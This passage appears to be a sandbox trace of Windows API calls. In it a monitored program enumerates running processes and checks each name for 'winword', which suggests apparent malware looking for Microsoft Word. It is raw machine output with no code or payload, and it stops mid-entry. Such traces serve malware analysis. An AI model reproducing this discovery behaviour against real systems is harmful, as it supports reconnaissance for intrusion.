lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0100.417] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="winword") returned 0x0 [0100.417] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0100.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.419] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356da70 [0100.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356da70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0100.419] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0100.419] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="winword") returned 0x0 [0100.419] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0100.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.420] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356d7a0 [0100.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x356d7a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0100.420] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0100.420] StrStrIA (lpFirst="pending.exe", lpSrch="winword") returned 0x0 [0100.420] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0100.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0100.421] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356bd98 [0100.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356bd98, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0100.421] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0100.421] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="winword") returned 0x0 [0100.421] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0100.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.422] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357d148 [0100.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357d148, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0100.422] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0100.422] StrStrIA (lpFirst="swing prefer.exe", lpSrch="winword") returned 0x0 [0100.422] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0100.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0100.423] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356be60 [0100.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356be60, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0100.423] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0100.424] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="winword") returned 0x0 [0100.424] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0100.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.425] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d168 [0100.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357d168, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0100.425] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0100.425] StrStrIA (lpFirst="nights-attending.exe", lpSrch="winword") returned 0x0 [0100.425] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0100.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.426] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356d8f0 [0100.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x356d8f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0100.426] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0100.426] StrStrIA (lpFirst="installed.exe", lpSrch="winword") returned 0x0 [0100.426] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0100.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0100.428] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356c158 [0100.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356c158, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0100.428] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0100.428] StrStrIA (lpFirst="references compounds.exe", lpSrch="winword") returned 0x0 [0100.428] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0100.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.429] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d188 [0100.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357d188, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0100.429] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0100.429] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="winword") returned 0x0 [0100.429] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0100.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.430] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d2c8 [0100.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357d2c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0100.430] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0100.430] StrStrIA (lpFirst="registered try.exe", lpSrch="winword") returned 0x0 [0100.430] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0100.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0100.432] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356c180 [0100.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356c180, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0100.432] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0100.432] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="winword") returned 0x0 [0100.432] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0100.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.433] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356da88 [0100.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x356da88, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0100.433] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0100.433] StrStrIA (lpFirst="invite.exe", lpSrch="winword") returned 0x0 [0100.433] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0100.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.434] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356da28 [0100.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x356da28, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0100.434] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0100.434] StrStrIA (lpFirst="idol.exe", lpSrch="winword") returned 0x0 [0100.434] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0100.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0100.435] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356be88 [0100.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356be88, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0100.435] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0100.435] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="winword") returned 0x0 [0100.435] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0100.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.437] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356c1a8 [0100.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356c1a8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0100.437] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0100.437] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="winword") returned 0x0 [0100.437] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0100.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.438] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356d8a8 [0100.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x356d8a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0100.438] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0100.438] StrStrIA (lpFirst="powell_jane.exe", lpSrch="winword") returned 0x0 [0100.438] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0100.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.439] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d248 [0100.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357d248, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0100.439] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0100.439] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="winword") returned 0x0 [0100.439] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0100.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.441] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356d7b8 [0100.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x356d7b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0100.441] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0100.441] StrStrIA (lpFirst="gainedshape.exe", lpSrch="winword") returned 0x0 [0100.441] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0100.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.442] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d2e8 [0100.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357d2e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0100.442] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0100.442] StrStrIA (lpFirst="opens-versions.exe", lpSrch="winword") returned 0x0 [0100.442] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0100.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0100.443] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356bf28 [0100.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356bf28, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0100.443] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0100.443] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="winword") returned 0x0 [0100.443] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0100.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.444] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356da40 [0100.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x356da40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0100.445] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0100.445] StrStrIA (lpFirst="3dftp.exe", lpSrch="winword") returned 0x0 [0100.445] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0100.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.446] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d1c8 [0100.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357d1c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0100.446] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0100.446] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="winword") returned 0x0 [0100.446] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0100.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 